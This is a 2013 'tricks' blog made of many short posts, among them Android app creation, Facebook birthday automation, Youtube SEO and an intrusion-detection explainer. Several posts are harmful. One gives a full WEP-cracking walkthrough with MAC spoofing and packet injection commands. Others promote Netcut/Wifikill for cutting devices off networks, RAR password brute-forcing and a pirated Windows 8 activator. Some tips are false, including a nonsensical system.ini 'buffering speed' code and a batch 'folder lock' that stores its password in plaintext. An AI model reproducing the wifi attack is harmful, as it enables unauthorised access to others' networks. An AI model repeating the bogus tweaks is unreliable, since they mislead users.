Friday, November 29, 2013

Create you own android app for Free

Create You Own Android App For Free Easly 100% Work.

Many people have asked me how to make their own android app so here is the tutorials.

Hi people out there today i am going to give you the most simple trick to make your own android app for your website , blog or anything, so that people can also browse your site easily by their android mobile phones.

First go to the following website and click create now - Click Here
And click Create now as in image below -


After that select the option you will prefer , suppose you want to make an android app for your website then you should click on the link that says website , if you want to make an android app for and pdf document then you should select the second option , and so on the third option.

If you wanna create an android app for your website click website , and a form like this will appear.


Fill out the form .
Give the link of the website that you want to create app for
Give the name of the app like 'cyber tycoon'.
Add a description for your website in the description box .
Chose  a custom icon if you want so.
now choose the category as blog don't change it otherwise your all will not work.

After clicking create app you will get  a form like this


Just fill up the form and click sign up and your account will be created

And now you will be redirected to the download page of your app .
Now download the app and  upload it in and site that you would like  your fans to download from like , mediafire,4shared,google play,4mobile and much more.

If you want me to give you an tutorial on how to make an android game then Click Here
For More Click Here

How to wish Happy Birthday to everyone on Facebook Automatically

Hello guys so today i am going to give you an trick by which you can automatically wish your friends happy birthday on their birthday's .

How to wish Happy Birthday to everyone on Facebook Automatically?

Some times you don't even have time to wish your friends on their birthday but today i am gonna give you a trick by which you will be able to automatically post happy birthday to them.

Steps:

1 : Login to your Facebook Account .
2 : Now open this app by clicking here.
3 : Now you will have to connect your Facebook account with this app  . you can easily do this by getting instructions from the images below.




4 : Now you can see an list of all your friends whose birthdays are coming . now you can schedule any message to them .

5 : You can also edit the preferences like setting the time at which your Birthday wishes will be posted and your Email updates frequency. You can also delete your account from this menu if you decide to stop using birtdayFB.

If you find any problem you can comment below .

For More Click Here


How to Increase RAM of your pc Without Softwares

Do you Know that you can your USB Drive's Space as a Virtual Ram For your PC and boost up your Pc's Performance. Simple Trick For More Click Here


To These There are some Simple Step.

1. Insert your pen-drive . (must be 2gb+)

2. Right Click on My Computer and go to its properties.

3. Click on Advanced tab.

4. Now you have to click on Change Button Under Virtual memory.

5. Click on Advanced tab.

6. Then Select the USB device you have inserted Before..

7. Now you have to click on custom size ratio and you have to give values as follows :
Initial Size - 1020
Maximum Size - 1020

Note -  This size depends on the memory which is free in your USB device So you can change it according to your choice.

8. Now click on the set button and then just click on OK button.

9. Now Just Restart your Pc and you Are done.

Enjoy..


If you have any problem you can comment below we will surely solve it. 


How to Remove Passwords From RAR Files?


Discription: How to Remove Passwords From RAR Files? Remove Winrar Password Easy Few Steps Hack Winrar Password. Download Free Winrar Password Cracker Free Download Winrar Password Cracker.

Option 1: Create a New Archive File Without Password Restriction

As a password can be set to protect the file from unauthorized access, when the file is double-clicked, the user is prompted to enter a password. But if you entered a wrong password, the file remains locked. Well, you can remove the password restrictions on RAR files by creating a new archive file.

1. Double-click the RAR file to open.

2. Enter the password when prompted. The contents of the file are then extracted.

3. Right-click the extracted file and click “Add to Archive.” The “Archive Name and Parameters” window launches.

4. Click the “Advanced” tab and then click “Set Password.”

5. Empty any text in the both password boxes in the Set Password window.

6. Click the “OK” button to save the settings. A new RAR archive file is created without a password.

Option 2: Remove the Password with a RAR Password Recovery

When you can not still access into the rar files with password protected, at this time you can take a rar password recovery tool to get in. RAR Password Unlocker is proved to be a helpful tool when you forgot WinRAR/RAR password and cannot open the RAR archives. It can recover RAR password at high speed via 3 attack options: Brute-force, Brute-force with user-defined Mask and Dictionary.

1. Download, install and launch RAR Password Unlocker.

2. Click “Open” to load your RAR file. Click “Open” again to continue.

3. Select the type of attack you want to use to retrieve your RAR password: brute-force attack, brute-force attack with mask or dictionary attack.

4. Click “Start” to retrieve your RAR password. The process may take several minutes to complete.

5. Click “OK” when you remove WINRAR password to exit RAR Password Unlocker.





How to Increase Youtube's videos buffering speed?

                           How to Increase Youtube's videos buffering speed 100% Works Increase Youtube Videos Buffering Speed Trick For More Click Here
Hi there guyz i am Hayat, once again with you people with a new trick in which I'll be showing you that how can you increase youtube's videos buffering speed without using any software. This trick is suitable for those users as well who have slow internet.This process don't take too much time.


Disclaimer: 
             H2K will not be responsible for any damage caused by you to your device. All the posts present in this blog are for educational purposes only. Try at your own risk.



Follow the steps Below:

Step 1: Open Run by pressing Windows key + R, or by going to start menu and searching for Run.


Step 2: Now in the Run type "system.ini" without quotes and hit enter.


Step 3: Now a Notepad file will appear. Like this (Picture given Below)


Copy the code given below and paste it in the notepad file which is already opened. Paste the code below [mci]
----------------------------------------------------------------------
page buffer=1000000Tbps



load=1000000Tbps



Download=1000000Tbps

save=1000000Tbpsback=1000000Tbps

search=1000000Tbps

sound=1000000Tbps

webcam=1000000Tbps

voice=1000000Tbps

faxmodemfast=1000000Tbps

update=1000000Tbps
----------------------------------------------------------------------

After pasting the code it will look like this

Step 4: Now close the notepad file and save it. If it is saved, then just restart you'r PC or Laptop and distinguish between the speed ;)

Now You are all done. If you are facing any problem saving this notepad file and having an error saying you "Access is denied" then just simply proceed to Step 5.

Step 5: Search for Notepad in the start menu, when it appears right click on it and select Run as administrator

Notepad file will be opened again. Now press Ctrl+o. And in the search menu write system.ini (File is located in C ==> Windows) and open that file. 


After the file is opened in the notepad again, Copy the code given above and paste it in the notepad as shown above. And save the file. Now restart your PC and observe the changes in the speed of the Youtube's video buffering.
Thanks For Visit My Site :) 

++Regards++

°°°·.°·..·°¯°·._.· hÄ…¥Ä…Å£ βąɲǥą$h ·._.·°¯°·.·° .·°°°



Saturday, November 23, 2013

How To Lock A Folder Using Notepad Emisoftwarezone


How To Lock A Folder Using Notepad Emisoftwarezone.blogspot.com tricks and tips 100% work Android tricks android hacking full tutorials free softwares hacking helps full version games full tutorials.

Credits to : E/\/\! Hax()r

Have you ever wondered if it is possible to Lock Folder using Notepad?

Well yes it is possible to Lock Folder Without Any Software. This method works fine in Xp/Vista and hopefully upper versions of windows.

Please don't use this method if you are unsure what you are doing, I am not responsible for any damage caused by use of this, though it won't occur if you follow my steps correctly.

Here we start:

Open Notepad from your Start -> All Programs -> Accessories -> Notepad



Step 1. Copy and Paste the below code in Notepad and Save it as FolderLock.bat
===============================================================
Code: 
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
End
==========================================================
Now save this notepad file as FolderLock.bat





Step 2 :- Now Double Click that new Batch file named FolderLock and it will make a new folder named Locker in the same location:

[Image: folderlock2.jpg]



Now put the Data Inside the folder Locker and again Double Click the Batch file to Lock it, this will give you a prompt, just Type y and press Enter: , File get locked 

Now keep the Batch File named FolderLock.bat in a different place like your USB Pen Drive so that only you can access the Folder you have locked.



To Unlock the Folder just double click the Batch file again and type y and press Enter.

Regards: E/\/\! Hax()r

How To Youtube SEO Works Here Too Full Tutorial


How To Youtube SEO Works Here Too Full Tutorial How To Youtube SEO Full Tutorial
7 Steps.

1)
Before uploading,change the name of the video to those of your keywords?
which should be in the title.
Your title is very important and you have 100 characters to work with.
Remember though that Google uses 70.So its best to stay within 70.


2)
To help your Youtube SEO have keywords at the start of your title,so in my case ''Youtube SEO'' ,
then put a short and attractive description.i.e.
''7 Tips on How to get Your Youtube Video found''
When we created our video either to share a useful tip or for marketing purposes we wish to get it found.


3)
Create a description of the Youtube Video and put the keywords in the description.
Depending How you've created your video.
If you've shot it impromptu,then you need to write the description up.
If on the other hand,you 've written what you want to write first then you can copy and paste it.
Youtube limit for description is 5.000 characters,including spaces,so that's about 800 words.


4)
Have the keywords on the LHS of the description.
For on page Youtube Seo,this is a neat little tip.


5)
Have the link that you wish the viewer to go as first line,
can use underscore to create a break
or=or++ all add emphasis to your link.


6)
When uploading your video,Youtube will give you a link for your video.
Copy your Youtube link and put it towards the bottom of your description.


7)
Have a call to action at the end of your video and 
at the end of your description,with a link.

So there you have Youtube Seo:7 Great Tips on how to get your youtube video found.
Thank you,

(Emi Haxor)


Thursday, November 21, 2013

Wifi Hacking All Best Tools


Wifi Hacking All Best Tools Free Download Full Version Hack Any Wifi Tutorial And best Wifi Hacking Tools Free Download Tutorial Click Here

==Wifi Hacking Tools==

I am going to share with you some of my favorite wireless tools that can be used to hack Wi-Fi password using Ubuntu or any other Linux distribution:

Netcut:
Disconnect any wifi devices from network. Support windows OS . The driver and Install package has been upgrade. tested working under windows 7 both 32 bit and 64 bit OS. Its change MAC address on any adapter, including wireless. Details at How to change MAC. Also support Clone MAC address from any PC that NetCut monitored.
Whereas Wifikill use for Android applications to disable internet connections for a device on same network. Disconnect wifi connection and get full network on your device.

Download: Netcut or Wifikill


Aircrack-ng
Aircrack-ng (a fork of aircrack) is my main tool for cracking Wi-Fi passwords. It has a wireless network detector, a packet sniffer, WEP and WPA/WPA2-PSK cracker, and an analysis tool for 802.11 wireless LANs. Aircrack-ng works with any wireless card whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.

Download: Aircrack-ng

Kismet 
Kismet is a really good network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. It will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. Kismet works in passive mode, which means it is capable of detecting the presence of both wireless access points and wireless clients without sending any log-gable packets.
ismet – does a little more than just detecting networks. Aside from providing every detail about a network except the encryption key, Kismet is a packet sniffer and intrusion detection system.

Download: Kismet


NetStumbler

Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.


Download: NetStumbler

SWScanner
SWScanner is specifically designed to make the whole wardriving process a lot easier. It is also intended to manage many tasks related to wireless networking. SWScanner is compatible with NetStumbler files and can be integrated with GPS devices.
These are only three of the many wireless tools that can get you going in no time, so feel free to explore.

Download: SWScanner


How To Hack Wifi Full Tutorial


How To Hack Wifi Full Tutorial (WIFI HACKING)
Step 1:-
First Download Backtrack  from the following link:
Step 2:-
Burn the iso image on CD and boot your laptop from CD drive
Step 3:-
Select the third boot option(VESA/KDE).
Step 4:-
Once in BT3, click the tiny black box in the lower left corner to load up a 
 "Konsole" window.
Step 5:-
Type the following command
airmon-ng
Note down the interface name. In this example wifi0
Step 6:-
airmon-ng stop wifi0
Step 7:-
ifconfig wifi0 down
Step 8:-
macchanger --mac 00:11:22:33:44:66 wifi0
Step 9:-
airmon-ng start wifi0
Step 10:-
airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paper
Note that if the same BSSID is available in the second part with STATION associated with it,
means you some one is accessing that network and our task will be little easier. 
If not than don’t worry we will still crack it.
Step 11:-
airodump-ng -c (channel) -w (file name)
Replace
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
--bssid (bssid) wifi0
Note it
Leave this console as it is and start new konsole
Step 12:-
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don’t get Association Successful mesage then keep on trying until
you got success.
Step 13:-
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don’t see ARP ACK and sent packets are not increasing or still 0 
than it means no 1 is
accessing that network.But don’t worry you go an optional step,
Leave this console as it is and start new k
Step 14:-
aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
konsole
message than keep on trying until you get success
got an optional step
konsole
–b (bssid) –h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console.
Step 15:-
aircrack-ng -b (bssid) (filename)-
Just wait and watch…..Backtrack will do rest of the work.
Hurray we got the key.

Done..!!

Intrusion Detection System (IDS)


>>Intrusion Detection System (IDS): 

A system that tries to identify attempts to hack or break into a computer system or to misuse it. IDSs may monitor packets passing over the network, monitor system files, monitor log files, or set up deception systems that attempt to trap hackers.

Computer systems have become more vulnerable to intrusions than ever. Intrusion Detection is a security technology that allows not only the detection of attacks, but
 also attempts to provide notification of new attacks unforeseen by other
 components. Intrusion detection is an important component of a security system, 
and it complements other security technologies.

>>How does an IDS work?

While there are several types of IDSs, the most common types work the same. 
They analyze network traffic and log files for certain patterns. What kind of 
patterns you may ask? While a firewall will continually block a hacker from connecting to a network, most firewalls never alert an administrator. 

The administrator may notice if he/she checks the access log of the firewall, but 
that could be weeks or even months after the attack. This is where an IDS comes
into play. The attempts to pass through the firewall are logged, and IDS will analyze its log. At some point in the log there will be a large number of request-reject 
entries. An IDS will flag the events and alert an administrator. The administrator 
can then see what is happening right after or even while the attacks are still taking place. This gives an administrator the advantage of being able to analyze the techniques being used, source of attacks, and methods used by the hacker.

>>Following are the types of intrusion detection systems :-

1)Host-Based Intrusion Detection System (HIDS): Host-based intrusion detection 
systems or HIDS are installed as agents on a host. These intrusion detection systems can look into system and application log files to detect any intruder activity.

2)Network-Based Intrusion Detection System (NIDS): These IDSs detect attacks by capturing and analyzing network packets. Listening on a network segment or 
switch, one network-based IDS can monitor the network traffic affecting multiple 
hosts that are connected to the network segment, thereby protecting those hosts. Network-based IDSs often consist of a set of single-purpose sensors or hosts placed 
at various points in a network. These units monitor network traffic, performing local analysis of that traffic and reporting attacks to a central management console.

 >>Some important topics comes under intrusion detection are as follows :-

1)Signatures: Signature is the pattern that you look for inside a data packet. A signature is used to detect one or multiple types of attacks. For example, the 
presence of “scripts/iisadmin” in a packet going to your web server may indicate 
an intruder activity. Signatures may be present in different parts of a data packet depending upon the nature of the attack.

2)Alerts: Alerts are any sort of user notification of an intruder activity. When an IDS detects an intruder, it has to inform security administrator about this using alerts. 
Alerts may be in the form of pop-up windows, logging to a console, sending e-mail and so on. Alerts are also stored in log files or databases where they can be viewed later on by security experts.

3)Logs: The log messages are usually saved in file.Log messages can be saved 
either in text or binary format.

4)False Alarms: False alarms are alerts generated due to an indication that is not 
an intruder activity. For example, misconfigured internal hosts may sometimes broadcast messages that trigger a rule resulting in generation of a false alert. 
Some routers, like Linksys home routers, generate lots of UPnP related alerts. To 
avoid false alarms, you have to modify and tune different default rules. In some 
cases you may need to disable some of the rules to avoid false alarms.

5)Sensor: The machine on which an intrusion detection system is running is also called the sensor in the literature because it is used to “sense” the network.


>>SNORT:  

Snort is a very flexible network intrusion detection system that has a large set of pre-configured rules. Snort also allows you to write your own rule set. There are several mailing lists on the internet where people share new snort rules that can counter the latest attacks.

Snort is a modern security application that can perform the following three functions :

* It can serve as a packet sniffer.
* It can work as a packet logger.

* It can work as a Network-Based Intrusion Detection System (NIDS).

TOOLS:
Smooth-Sec 3.0 Intrusion Detection System

Smooth-Sec is a lightweight and fully-ready IDS/IPS (Intrusion Detection/Prevention System) Linux distribution based on Debian 7 (wheezy), available for 32 and 64 bit architecture. The distribution includes the latest version of Snorby, Snort, Suricata, PulledPork and Pigsty. An easy setup process allows to deploy a complete IDS/IPS System within minutes, even for security beginners with minimal Linux experience.
  •     Debian 7 Wheezy based
  •     32 and 64 bit iso available. Snorby V 2.6.2
  •     Snort V 2.9.4.6
  •     Suricata V 1.4.3
  •     Pigsty V 0.1.0
  •     PulledPork V 0.6.1
==========================
64-Bit – smoothsec-3.0-amd64.iso

How to open Multiple Yahoo Messenger?


  • 1. Go to start > Run > Type regedit > Press Enter
  • 2. Click on the plus sign near the folder HKEY_CURRENT_USER
  • 3. Click on the plus sign near the folder Software
  • 4. Click on the plus sign near the folder Yahoo
  • 5. Click on the plus sign near the folder Pager
  • 6. Right Click on the folder name Test > New > DWORD Value
  • 7. Right side you will get a file named New Value #1
  • 8. Right Click on the file New Value #1 and Rename it as Plural and press enter
  • 9. Double Click on the file Plural
  • 10. You will get a windown named Edit DWORD Value
  • 11. Type 1 inside 'Select the Value data' and press enter
  • 12. Close the registery editor window
  • 13. Now you can launch multiple windows and use different ID's.
  • Cheers!!!


How To Block A Website Without Software

How To Block A Website Without Software

How To Block A Website Without Software.

>>>Steps

1] Browse C:\WINDOWS\system32\drivers\etc

2] Find the file named "HOSTS"

3] Open it in notepad

4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessable.

5] Done!


example :

127.0.0.1 localhost

127.0.0.2 www.orkut.com


www.orkut.com is now unaccessable


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.


ie:

127.0.0.3 www.yahoo.com

127.0.0.4 www.msn.com

127.0.0.5 www.google.com


This also works with banner sites, just find the host name of the server with the banners and do the same thing with that addy.

Hope this small tutorial could keep you going in simple way of blocking websites.. 

Download Free Windows 8 Activator

Download Full Version Window 8 Activator

Download Free Full Version Window 8 Activator free download window 8 activator how to activate window 8